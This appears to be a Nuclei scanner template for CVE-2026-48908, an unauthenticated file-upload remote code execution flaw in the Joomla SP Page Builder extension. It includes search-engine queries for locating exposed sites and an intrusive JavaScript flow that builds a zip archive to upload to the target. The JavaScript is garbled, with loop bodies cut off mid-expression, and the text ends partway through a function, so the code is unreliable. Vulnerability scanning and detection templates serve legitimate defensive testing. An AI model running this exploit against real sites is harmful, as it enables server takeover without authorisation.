id: CVE-2026-48908 info: name: Joomla SP Page Builder <= 6.6.1 - Unauthenticated Arbitrary File Upload RCE author: 0x_Akoko severity: critical description: | SP Page Builder for Joomla contains an unrestricted file upload vulnerability allowing unauthenticated users to upload and execute arbitrary PHP code, exploit requires no authentication. impact: | Unauthenticated attackers can upload and execute arbitrary PHP code, leading to full server compromise. remediation: | Update to the latest version of SP Page Builder for Joomla. reference: - https://mysites.guru/blog/sp-page-builder-zero-day-uploadcustomicon-rce/ - https://github.com/papageo75/CVE-2026-48908-PoC - https://nvd.nist.gov/vuln/detail/CVE-2026-48908 - https://www.cisa.gov/known-exploited-vulnerabilities-catalog classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H cvss-score: 9.8 cve-id: CVE-2026-48908 epss-score: 0.8813 epss-percentile: 0.9975 cwe-id: CWE-284 metadata: verified: true max-request: 3 vendor: joomshaper product: sp_page_builder framework: joomla shodan-query: http.html:"com_sppagebuilder" fofa-query: body="com_sppagebuilder" tags: cve,cve2026,joomla,sppagebuilder,rce,file-upload,intrusive,kev,vkev flow: | // build the icon-package zip at runtime with a random verify filename + content function crc32(b){var c,crc=0^(-1);for(var i=0;i>>1)):(c>>>1);}crc=(crc>>>8)^c;}return (crc^(-1))>>>0;} function sb(s){var a=[];for(var i=0;i>>8)&0xFF];} function u32(n){return [n&0xFF,(n>>>8)&0xFF,(n>>>16)&0xFF,(n>>>24)&0xFF];} function pp(d,a){for(var i=0;i>>2);r+=t.charAt(((x&3)<<4)|(y>>>4));r+=(i+1>>6)):"=";r+=(i+2